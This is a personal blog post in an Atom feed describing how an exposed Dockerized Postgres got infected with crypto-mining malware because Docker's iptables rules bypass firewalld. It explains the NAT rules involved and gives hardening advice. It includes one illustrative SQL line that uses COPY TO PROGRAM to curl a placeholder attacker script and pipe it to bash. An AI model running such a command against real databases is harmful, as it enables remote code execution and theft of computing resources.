<?xml version="1.0" encoding="utf-8"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:base="https://martingaston.dev">
  <title>martingaston.dev</title>
  <subtitle>I&#39;m Martin, a computer person living in London. I love longform content, systems programming and deploying on Fridays.</subtitle>
  <link href="https://martingaston.dev/feed/feed.xml" rel="self"/>
  <link href="https://martingaston.dev"/>
  <updated>2025-11-16T00:00:00Z</updated>
  <id>https://martingaston.dev</id>
  <author>
    <name>Martin Gaston</name>
    <email>hello@martingaston.dev</email>
  </author>
  <entry>
    <title>Docker Got Me Hacked On Halloween</title>
    <link href="https://martingaston.dev/articles/docker-got-me-hacked-on-halloween/"/>
    <updated>2025-11-16T00:00:00Z</updated>
    <id>https://martingaston.dev/articles/docker-got-me-hacked-on-halloween/</id>
    <content xml:lang="en" type="html">&lt;p&gt;Docker on Linux futzes with its own &lt;code&gt;iptables&lt;/code&gt; and so totally sidesteps &lt;code&gt;firewalld&lt;/code&gt;/&lt;code&gt;ufw&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Let&#39;s rewind.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Friday, October 31:&lt;/strong&gt; I span up a Postgres instance in a Docker container on one of my VMs for a proof-of-concept demo I&#39;d be doing the next week. I had &lt;code&gt;firewalld&lt;/code&gt; configured to deny incoming connections to port 5432, so I didn&#39;t even think about securing the database - it surely wouldn&#39;t be accessible on the public internet!&lt;/p&gt;
&lt;p&gt;Look. What I did here was terrible. I copied and pasted the &lt;code&gt;docker run --name some-postgres -e POSTGRES_PASSWORD=mysecretpassword -d postgres&lt;/code&gt; command from &lt;a href=&quot;https://hub.docker.com/_/postgres&quot;&gt;the Postgres image&lt;/a&gt;, exposed &lt;code&gt;-p 5432&lt;/code&gt; and called it a day.&lt;/p&gt;
&lt;p&gt;This was lazy and bad, but I thought that access from the public internet would be blocked. Only another machine inside my &lt;a href=&quot;https://tailscale.com/&quot;&gt;tailnet&lt;/a&gt; was going to access it. No big deal.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Monday, November 3:&lt;/strong&gt; Came back after a lovely weekend of not thinking about technology. But alas, the &lt;a href=&quot;https://malpedia.caad.fkie.fraunhofer.de/details/elf.kinsing&quot;&gt;kinsing&lt;/a&gt; malware had made its way on the machine and was obliterating my poor 1 vCPU to mine cryptocurrency.&lt;/p&gt;
&lt;h2 id=&quot;but%2C-how%3F&quot; tabindex=&quot;-1&quot;&gt;&lt;a class=&quot;header-anchor&quot; href=&quot;https://martingaston.dev/articles/docker-got-me-hacked-on-halloween/#but%2C-how%3F&quot;&gt;But, how?&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;Firstly, did you know PostgreSQL can run arbitrary commands on the host machine?&lt;/p&gt;
&lt;pre class=&quot;language-sql&quot;&gt;&lt;code class=&quot;language-sql&quot;&gt;COPY &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token keyword&quot;&gt;SELECT&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&#39;&#39;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;TO&lt;/span&gt; PROGRAM &lt;span class=&quot;token string&quot;&gt;&#39;curl http://a-very-naughty-server.com/malicious-crypto-miner-install-script.sh | bash&#39;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;That&#39;ll do it.&lt;/p&gt;
&lt;p&gt;Did you also know that the &lt;code&gt;-p 5432&lt;/code&gt; flag binds to &lt;code&gt;0.0.0.0&lt;/code&gt;, an IPv4 address which represents all possible network interfaces - including any connected to the public internet?&lt;/p&gt;
&lt;p&gt;Now, this &lt;code&gt;0.0.0.0&lt;/code&gt; binding isn&#39;t something you have to worry about if you&#39;re using Docker Desktop on macOS, because you&#39;re actually running inside a VM. And that VM only interacts with your host network&#39;s &lt;code&gt;localhost&lt;/code&gt;. But on Linux that would mean you&#39;ve basically opened the door to the whole internet, unless you&#39;ve got a firewall blocking that port.&lt;/p&gt;
&lt;p&gt;Which is what I had though, right? That&#39;s &lt;em&gt;literally&lt;/em&gt; &lt;code&gt;firewalld&lt;/code&gt;. &lt;strong&gt;The clue is in the name!&lt;/strong&gt;&lt;/p&gt;
&lt;pre class=&quot;language-bash&quot;&gt;&lt;code class=&quot;language-bash&quot;&gt;$ &lt;span class=&quot;token function&quot;&gt;sudo&lt;/span&gt; firewall-cmd &lt;span class=&quot;token parameter variable&quot;&gt;--zone&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;public --list-all&lt;br /&gt;public &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;default, active&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;br /&gt;  target: DROP&lt;br /&gt;  ingress-priority: &lt;span class=&quot;token number&quot;&gt;0&lt;/span&gt;&lt;br /&gt;  egress-priority: &lt;span class=&quot;token number&quot;&gt;0&lt;/span&gt;&lt;br /&gt;  icmp-block-inversion: no&lt;br /&gt;  interfaces: ens3&lt;br /&gt;  sources:&lt;br /&gt;  services: dhcpv6-client http https mdns&lt;br /&gt;  ports:&lt;br /&gt;  protocols:&lt;br /&gt;  forward: &lt;span class=&quot;token function&quot;&gt;yes&lt;/span&gt;&lt;br /&gt;  masquerade: no&lt;br /&gt;  forward-ports:&lt;br /&gt;  source-ports:&lt;br /&gt;  icmp-blocks:&lt;br /&gt;  rich rules:&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Deny by default! Drop anything that&#39;s not http(s), DNS or some thingamajic for IPv6! No port &lt;code&gt;5432&lt;/code&gt; for you!&lt;/p&gt;
&lt;p&gt;Actually, no.&lt;/p&gt;
&lt;p&gt;Let&#39;s run a basic &lt;code&gt;nginx&lt;/code&gt; container and expose container port &lt;code&gt;80&lt;/code&gt; to port &lt;code&gt;8000&lt;/code&gt; on the host:&lt;/p&gt;
&lt;pre class=&quot;language-bash&quot;&gt;&lt;code class=&quot;language-bash&quot;&gt;$ &lt;span class=&quot;token function&quot;&gt;docker&lt;/span&gt; run &lt;span class=&quot;token parameter variable&quot;&gt;--rm&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-d&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-p&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;8000&lt;/span&gt;:80 nginx&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And then from a &lt;em&gt;totally different computer&lt;/em&gt; let&#39;s quite happily access that page:&lt;/p&gt;
&lt;pre class=&quot;language-bash&quot;&gt;&lt;code class=&quot;language-bash&quot;&gt;$ &lt;span class=&quot;token function&quot;&gt;curl&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;104.21&lt;/span&gt;.1.191:8000&lt;br /&gt;&lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;!&lt;/span&gt;DOCTYPE html&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;html&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;head&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;title&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;Welcome to nginx&lt;span class=&quot;token operator&quot;&gt;!&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;/title&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;style&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;br /&gt;html &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt; color-scheme: light dark&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;br /&gt;body &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt; width: 35em&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt; margin: &lt;span class=&quot;token number&quot;&gt;0&lt;/span&gt; auto&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;&lt;br /&gt;font-family: Tahoma, Verdana, Arial, sans-serif&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;/style&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;/head&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;body&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;h&lt;span class=&quot;token operator&quot;&gt;&lt;span class=&quot;token file-descriptor important&quot;&gt;1&lt;/span&gt;&gt;&lt;/span&gt;Welcome to nginx&lt;span class=&quot;token operator&quot;&gt;!&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;/h&lt;span class=&quot;token operator&quot;&gt;&lt;span class=&quot;token file-descriptor important&quot;&gt;1&lt;/span&gt;&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;p&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;If you see this page, the nginx web server is successfully installed and&lt;br /&gt;working. Further configuration is required.&lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;/p&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;p&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;For online documentation and support please refer to&lt;br /&gt;&lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;a &lt;span class=&quot;token assign-left variable&quot;&gt;href&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;http://nginx.org/&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;nginx.org&lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;/a&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;.&lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;br/&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;br /&gt;Commercial support is available at&lt;br /&gt;&lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;a &lt;span class=&quot;token assign-left variable&quot;&gt;href&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;http://nginx.com/&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;nginx.com&lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;/a&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;.&lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;/p&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;p&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;em&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;Thank you &lt;span class=&quot;token keyword&quot;&gt;for&lt;/span&gt; using nginx.&lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;/em&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;/p&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;/body&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;/html&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;How is this madness happening? I&#39;ve said it before, but: it shouldn&#39;t be getting through the firewall!?&lt;/p&gt;
&lt;p&gt;Alright, let&#39;s do this. Hold on to something.&lt;/p&gt;
&lt;p&gt;Let&#39;s remove some of Docker&#39;s functionality, namely its ability to set its own &lt;code&gt;iptables&lt;/code&gt; rules and the &lt;code&gt;userland-proxy&lt;/code&gt;. We won&#39;t worry about what the latter is in this article.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;code&gt;iptables&lt;/code&gt; is a very powerful tool that allows you to fiddle around with the &lt;a href=&quot;https://www.netfilter.org/&quot;&gt;netfilter&lt;/a&gt; kernel module, which is all very terrifying and cool.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;pre class=&quot;language-bash&quot;&gt;&lt;code class=&quot;language-bash&quot;&gt;$ &lt;span class=&quot;token builtin class-name&quot;&gt;echo&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&#39;{&quot;iptables&quot;:false,&quot;userland-proxy&quot;:false}&#39;&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;sudo&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;tee&lt;/span&gt; /etc/docker/daemon.json&lt;br /&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;iptables&quot;&lt;/span&gt;:false&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;$ &lt;span class=&quot;token function&quot;&gt;sudo&lt;/span&gt; systemctl restart &lt;span class=&quot;token function&quot;&gt;docker&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Now, finally, a &lt;code&gt;curl 104.21.1.191:8000&lt;/code&gt; does nothing. It&#39;s also broken a whole bunch of other important things to do with container networking, but we won&#39;t worry about that.&lt;/p&gt;
&lt;p&gt;Let&#39;s figure out the IP of the container inside the &lt;code&gt;docker0&lt;/code&gt; bridge network:&lt;/p&gt;
&lt;pre class=&quot;language-bash&quot;&gt;&lt;code class=&quot;language-bash&quot;&gt;&lt;span class=&quot;token function&quot;&gt;docker&lt;/span&gt; inspect 1bba7bc8e37f &lt;span class=&quot;token parameter variable&quot;&gt;-f&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&#39;&#39;&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;token number&quot;&gt;172.17&lt;/span&gt;.0.2&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Now we can muck around with &lt;code&gt;iptables&lt;/code&gt; ourselves so that requests to &lt;code&gt;104.21.1.191:8000&lt;/code&gt; go to &lt;code&gt;172.17.0.2:80&lt;/code&gt;. To do this we&#39;ll be using Network Address Translation (NAT), which is how the majority of container networking is handled.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;code&gt;iptables&lt;/code&gt; is powerful and complex and probably not worth investing a great amount of time into figuring out, as it&#39;s been superseded by &lt;code&gt;nftables&lt;/code&gt;.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;pre class=&quot;language-bash&quot;&gt;&lt;code class=&quot;language-bash&quot;&gt;&lt;span class=&quot;token comment&quot;&gt;# PREROUTING run before any other routing decisions; the packet is on the way in&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;token comment&quot;&gt;# -p specifies tcp protocol&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;token comment&quot;&gt;# --dport is the destination port, so requests to port 8000&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;token comment&quot;&gt;# -j jumps to destination NAT (dnat), which changes the packet&#39;s destination IP and/or port&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;token comment&quot;&gt;# --to-destination specifies what the address ends up as: it&#39;s 172.17.0.2:80, aka where our container is running&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;token function&quot;&gt;sudo&lt;/span&gt; iptables &lt;span class=&quot;token parameter variable&quot;&gt;-t&lt;/span&gt; nat &lt;span class=&quot;token parameter variable&quot;&gt;-A&lt;/span&gt; PREROUTING &lt;span class=&quot;token parameter variable&quot;&gt;-p&lt;/span&gt; tcp &lt;span class=&quot;token parameter variable&quot;&gt;--dport&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;8000&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-j&lt;/span&gt; DNAT --to-destination &lt;span class=&quot;token number&quot;&gt;172.17&lt;/span&gt;.0.2:80&lt;br /&gt;&lt;br /&gt;&lt;span class=&quot;token comment&quot;&gt;# POSTROUTING runs after other routing decisions; the packet is on the way out &lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;token comment&quot;&gt;# -s matches packets originating from 172.17.0.2, i.e. our container&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;token comment&quot;&gt;# ! -o docker0 will only match packets that aren&#39;t trying to exit through the docker0 interface&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;token comment&quot;&gt;# -j MASQUERADE will dynamically rewrite the source IP to the host&#39;s outgoing adress&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;token function&quot;&gt;sudo&lt;/span&gt; iptables &lt;span class=&quot;token parameter variable&quot;&gt;-t&lt;/span&gt; nat &lt;span class=&quot;token parameter variable&quot;&gt;-A&lt;/span&gt; POSTROUTING &lt;span class=&quot;token parameter variable&quot;&gt;-s&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;172.17&lt;/span&gt;.0.2/32 &lt;span class=&quot;token operator&quot;&gt;!&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-o&lt;/span&gt; docker0 &lt;span class=&quot;token parameter variable&quot;&gt;-j&lt;/span&gt; MASQUERADE&lt;br /&gt;&lt;br /&gt;&lt;span class=&quot;token comment&quot;&gt;# Allows packets that are heading to the container to go through the firewall - this rule will occur _after_ the original packet has had its destination address changed&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;token function&quot;&gt;sudo&lt;/span&gt; iptables &lt;span class=&quot;token parameter variable&quot;&gt;-A&lt;/span&gt; FORWARD &lt;span class=&quot;token parameter variable&quot;&gt;-p&lt;/span&gt; tcp &lt;span class=&quot;token parameter variable&quot;&gt;-d&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;172.17&lt;/span&gt;.0.2 &lt;span class=&quot;token parameter variable&quot;&gt;--dport&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;80&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-j&lt;/span&gt; ACCEPT&lt;br /&gt;&lt;br /&gt;&lt;span class=&quot;token comment&quot;&gt;# Allows packets that are coming out of the container to go through the firewall&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;token function&quot;&gt;sudo&lt;/span&gt; iptables &lt;span class=&quot;token parameter variable&quot;&gt;-A&lt;/span&gt; FORWARD &lt;span class=&quot;token parameter variable&quot;&gt;-p&lt;/span&gt; tcp &lt;span class=&quot;token parameter variable&quot;&gt;-s&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;172.17&lt;/span&gt;.0.2 &lt;span class=&quot;token parameter variable&quot;&gt;--sport&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;80&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-j&lt;/span&gt; ACCEPT&lt;/code&gt;&lt;/pre&gt;
&lt;blockquote&gt;
&lt;p&gt;Docker doesn&#39;t add these exact rules, but these are easier to understand and it&#39;s close enough.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;What we see here is if a packet arrives at the machine asking for port &lt;code&gt;80&lt;/code&gt;, the rules will transmogrify it to actually be for &lt;code&gt;172.17.0.2:80&lt;/code&gt; and then it can be flung over to the &lt;code&gt;docker0&lt;/code&gt; bridge network. On the way out, we once again modify the packet so that it goes back out as if it was calling the original packet the entire time.&lt;/p&gt;
&lt;p&gt;And we&#39;re back:&lt;/p&gt;
&lt;pre class=&quot;language-bash&quot;&gt;&lt;code class=&quot;language-bash&quot;&gt;$ &lt;span class=&quot;token function&quot;&gt;curl&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;104.21&lt;/span&gt;.1.191:8000&lt;br /&gt;&lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;!&lt;/span&gt;DOCTYPE html&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;html&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;head&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;title&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;Welcome to nginx&lt;span class=&quot;token operator&quot;&gt;!&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;/title&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;style&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;br /&gt;html &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt; color-scheme: light dark&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;br /&gt;body &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt; width: 35em&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt; margin: &lt;span class=&quot;token number&quot;&gt;0&lt;/span&gt; auto&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;&lt;br /&gt;font-family: Tahoma, Verdana, Arial, sans-serif&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;/style&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;/head&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;body&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;h&lt;span class=&quot;token operator&quot;&gt;&lt;span class=&quot;token file-descriptor important&quot;&gt;1&lt;/span&gt;&gt;&lt;/span&gt;Welcome to nginx&lt;span class=&quot;token operator&quot;&gt;!&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;/h&lt;span class=&quot;token operator&quot;&gt;&lt;span class=&quot;token file-descriptor important&quot;&gt;1&lt;/span&gt;&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;p&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;If you see this page, the nginx web server is successfully installed and&lt;br /&gt;working. Further configuration is required.&lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;/p&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;p&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;For online documentation and support please refer to&lt;br /&gt;&lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;a &lt;span class=&quot;token assign-left variable&quot;&gt;href&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;http://nginx.org/&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;nginx.org&lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;/a&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;.&lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;br/&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;br /&gt;Commercial support is available at&lt;br /&gt;&lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;a &lt;span class=&quot;token assign-left variable&quot;&gt;href&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;http://nginx.com/&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;nginx.com&lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;/a&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;.&lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;/p&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;p&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;em&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;Thank you &lt;span class=&quot;token keyword&quot;&gt;for&lt;/span&gt; using nginx.&lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;/em&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;/p&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;/body&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;/html&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;We haven&#39;t messed with &lt;code&gt;firewalld&lt;/code&gt; at all during this. &lt;code&gt;firewalld&lt;/code&gt; is still configured to deny the request to port &lt;code&gt;8000&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;This is all fun and games, but why does it clash with &lt;code&gt;firewalld&lt;/code&gt;? Well, &lt;code&gt;firewalld&lt;/code&gt; (and &lt;code&gt;ufw&lt;/code&gt;) &lt;em&gt;also&lt;/em&gt; interact with the kernel-level netfilter features, and they end up clashing. Docker&#39;s use of &lt;code&gt;iptables&lt;/code&gt; will essentially punch a hole straight in whatever you&#39;d asked &lt;code&gt;firewalld&lt;/code&gt; to be doing.&lt;/p&gt;
&lt;p&gt;This is why I got hacked - I basically left the front door wide open. I&#39;m not complaining. I was rushing around and not paying attention. Docker has all the relevant information nestled within their documentation. Binding a database to &lt;code&gt;0.0.0.0&lt;/code&gt; is &lt;em&gt;obviously&lt;/em&gt; a bad idea, even if you&#39;re largely just mucking about. And not changing the password from the one that&#39;s listed on the Docker Hub page is literally asking for the trouble.&lt;/p&gt;
&lt;h1&gt;What can you do about it?&lt;/h1&gt;
&lt;p&gt;If you don&#39;t want to start mucking around with your OS, you could follow a couple of simple rules:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Don&#39;t indiscriminantly bind to &lt;code&gt;0.0.0.0&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Don&#39;t open a port that you don&#39;t want to be open&lt;/li&gt;
&lt;li&gt;Have your VPS behind a hardware firewall&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The trouble is, I&#39;m extremely cheap and I don&#39;t want to change my VPS. And I&#39;m also extremely forgetful, so I&#39;ll use &lt;code&gt;-p 5432:5432&lt;/code&gt; at the worst possible time.&lt;/p&gt;
&lt;p&gt;Here&#39;s the functionality I want:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;If there&#39;s a request for port &lt;code&gt;443&lt;/code&gt; via the machine&#39;s public interface, that should be allowed&lt;/li&gt;
&lt;li&gt;If there&#39;s a request for any other port via the machine&#39;s public interface, that should be denied&lt;/li&gt;
